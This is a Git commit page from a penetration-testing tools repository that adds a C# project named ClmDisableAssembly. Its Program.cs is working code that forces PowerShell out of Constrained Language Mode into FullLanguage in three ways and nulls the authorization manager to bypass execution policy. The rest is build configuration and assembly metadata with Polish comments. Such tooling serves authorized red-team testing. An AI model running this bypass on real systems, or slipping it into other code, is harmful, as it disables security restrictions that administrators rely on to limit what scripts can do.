Git/mgeeky-Penetration-Testing-Tools
1
0
Fork 0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2025-09-03 02:28:34 +02:00
Code Issues Packages Projects Releases Wiki Activity

Added Bypass-ConstrainedLanguageMode

Browse Source
This commit is contained in:
mb
2019-06-21 04:52:38 +02:00
parent 4aa113e076
commit 4e17445eaf
14 changed files with 903 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

79
red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableAssembly/ClmDisableAssembly.csproj Normal file
View File

@ -0,0 +1,79 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{5054C13F-1351-47B9-A6CA-25F4548F68A7}</ProjectGuid>
<OutputType>Library</OutputType>
<RootNamespace>ClmDisableAssembly</RootNamespace>
<AssemblyName>ClmDisableAssembly</AssemblyName>
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile />
<PublishUrl>publish\</PublishUrl>
<Install>true</Install>
<InstallFrom>Disk</InstallFrom>
<UpdateEnabled>false</UpdateEnabled>
<UpdateMode>Foreground</UpdateMode>
<UpdateInterval>7</UpdateInterval>
<UpdateIntervalUnits>Days</UpdateIntervalUnits>
<UpdatePeriodically>false</UpdatePeriodically>
<UpdateRequired>false</UpdateRequired>
<MapFileExtensions>true</MapFileExtensions>
<ApplicationRevision>0</ApplicationRevision>
<ApplicationVersion>1.0.0.%2a</ApplicationVersion>
<IsWebBootstrapper>false</IsWebBootstrapper>
<UseApplicationTrust>false</UseApplicationTrust>
<BootstrapperEnabled>true</BootstrapperEnabled>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup>
<StartupObject />
</PropertyGroup>
<PropertyGroup />
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
<HintPath>System.Management.Automation.dll</HintPath>
</Reference>
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="app.config" />
<None Include="app.manifest" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
<Visible>False</Visible>
<ProductName>.NET Framework 3.5 SP1</ProductName>
<Install>false</Install>
</BootstrapperPackage>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

75
red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableAssembly/Program.cs Normal file
View File

@ -0,0 +1,75 @@
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace ClmDisableAssembly
{
public class ClmDisableAssembly
{
[System.Runtime.InteropServices.DllImport("kernel32.dll")]
static extern int GetCurrentThreadId();
public static int Start(string arg)
{
Console.WriteLine("[+] Managed mode assembly. Disabling CLM globally.");
Console.WriteLine("\tCurrent thread ID (managed/unmanaged): " + System.Threading.Thread.CurrentThread.ManagedThreadId.ToString() + " / " + GetCurrentThreadId().ToString());
if (arg.Length > 0)
{
Console.WriteLine($"\tPassed argument: '{arg}'");
}
// Switches back to FullLanguage in CLM
Runspace.DefaultRunspace.SessionStateProxy.LanguageMode = PSLanguageMode.FullLanguage;
try
{
Runspace.DefaultRunspace.InitialSessionState.LanguageMode = PSLanguageMode.FullLanguage;
// Bypasses PowerShell execution policy
Runspace.DefaultRunspace.InitialSessionState.AuthorizationManager = null;
}
catch (Exception e)
{
Console.WriteLine("[-] Approach #1 failed: " + e);
}
try
{
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.ApartmentState = System.Threading.ApartmentState.STA;
runspace.ThreadOptions = PSThreadOptions.UseCurrentThread;
runspace.Open();
runspace.SessionStateProxy.LanguageMode = PSLanguageMode.FullLanguage;
runspace.Close();
}
catch (Exception e)
{
Console.WriteLine("[-] Approach #2 failed: " + e);
}
try
{
InitialSessionState initialSessionState = InitialSessionState.CreateDefault();
initialSessionState.ApartmentState = System.Threading.ApartmentState.STA;
initialSessionState.AuthorizationManager = null;
initialSessionState.ThreadOptions = PSThreadOptions.UseCurrentThread;
using (Runspace runspace = RunspaceFactory.CreateRunspace(initialSessionState))
{
runspace.Open();
runspace.SessionStateProxy.LanguageMode = PSLanguageMode.FullLanguage;
runspace.InitialSessionState.AuthorizationManager = null;
runspace.InitialSessionState.LanguageMode = PSLanguageMode.FullLanguage;
runspace.Close();
}
}
catch (Exception e)
{
Console.WriteLine("[-] Approach #3 failed: " + e);
}
return 0;
}
}
}

36
red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableAssembly/Properties/AssemblyInfo.cs Normal file
View File

@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// Ogólne informacje o zestawie są kontrolowane poprzez następujący
// zestaw atrybutów. Zmień wartości tych atrybutów, aby zmodyfikować informacje
// powiązane z zestawem.
[assembly: AssemblyTitle("ClmDisableAssembly")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("ClmDisableAssembly")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Ustawienie elementu ComVisible na wartość false sprawia, że typy w tym zestawie są niewidoczne
// dla składników COM. Jeśli potrzebny jest dostęp do typu w tym zestawie z
// COM, ustaw wartość true dla atrybutu ComVisible tego typu.
[assembly: ComVisible(false)]
// Następujący identyfikator GUID jest identyfikatorem biblioteki typów w przypadku udostępnienia tego projektu w modelu COM
[assembly: Guid("5054c13f-1351-47b9-a6ca-25f4548f68a7")]
// Informacje o wersji zestawu zawierają następujące cztery wartości:
//
// Wersja główna
// Wersja pomocnicza
// Numer kompilacji
// Rewizja
//
// Możesz określić wszystkie wartości lub użyć domyślnych numerów kompilacji i poprawki
// przy użyciu symbolu „*”, tak jak pokazano poniżej:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

BIN
red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableAssembly/System.Management.Automation.dll Normal file
View File

Binary file not shown.